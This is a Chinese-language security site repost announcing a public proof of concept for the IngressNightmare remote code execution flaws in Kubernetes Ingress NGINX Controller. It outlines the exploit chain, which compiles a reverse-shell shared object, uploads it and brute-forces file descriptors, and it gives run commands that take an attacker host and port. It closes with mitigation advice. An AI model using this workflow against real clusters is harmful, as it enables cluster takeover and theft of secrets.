PoC 针对 Ingress NGINX 漏洞 编号 CVE-2025-1097、1098、24514、1974

admin 2025年4月2日23:22:30评论24 views字数 1303阅读4分20秒阅读模式
PoC 针对 Ingress NGINX 漏洞 编号 CVE-2025-1097、1098、24514、1974

针对 Ingress NGINX 的漏洞 - IngressNightmare

该项目针对 Kubernetes 的 Ingress NGINX Controller 中的关键未经身份验证的远程代码执行 (RCE)漏洞提供了攻击,统称为 IngressNightmare。(由Wiz研究)

在最初的研究中,Wiz 团队没有提供 PoC 或功能漏洞,因此我们决定创建自己的并与社区分享。

概述

Ingress NGINX 控制器是 Kubernetes 环境中广泛使用的组件,用于管理对集群内服务的外部访问。最近在其准入控制器中发现的漏洞(CVE-2025-1097、CVE-2025-1098、CVE-2025-24514、CVE-2025-1974)可能导致跨命名空间的所有机密遭到未经授权的访问,并可能导致集群完全被接管。

视频

漏洞利用工作流程

该漏洞主要遵循以下步骤:

  • 生成共享对象(由注入的ssl_engine属性使用): 编译包含反向 shell payload 的 .so 库(evil_engine.so)。

  • 上传共享对象: 将编译后的共享对象发送到入口 pod,利用请求处理(客户端主体缓冲区)。这里的技巧是Content-Length向服务器发送不同的内容以保持连接打开并维护文件的文件描述符打开。

  • 暴力破解 fd: 遍历进程 ID 和文件描述符(/proc/{pid}/fd/{fd})来识别引用上传对象的正确描述符。

用法

先决条件:Python 3.x GCC 编译器 Python 请求模块

运行漏洞利用:

pip3 install -r requirements.txt
python3 exploit.py <ingress_url><admission_webhook_url> [attacker_host:port](attacker_host:port)

EX:

python3 xpl.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system192.168.1.63:443

有时admission webhook位于不同的命名空间中。在这种情况下,您需要在末尾指定命名空间,例如kube-system、default或ingress-nginx。

  • <ingress_url>:目标 Ingress URL(公共)

  • <admission_webhook_url>:准入 webhook URL(内部 webhook)

  • Attacker_host:port:反向 shell 的主机和端口

减轻

立即更新:将 Ingress NGINX Controller 升级到修补版本(1.12.1 或 1.11.5)。

限制准入 webhook:将对 webhook 的访问限制为仅限 Kubernetes API 服务器。

暂时禁用:如果无法立即升级,请考虑暂时禁用准入控制器组件。

项目地址:

https://github.com/hakaioffsec/IngressNightmare-PoC

原文始发于微信公众号(Ots安全):PoC 针对 Ingress NGINX 漏洞 编号 CVE-2025-1097、1098、24514、1974

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月2日23:22:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PoC 针对 Ingress NGINX 漏洞 编号 CVE-2025-1097、1098、24514、1974http://cn-sec.com/archives/3891731.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息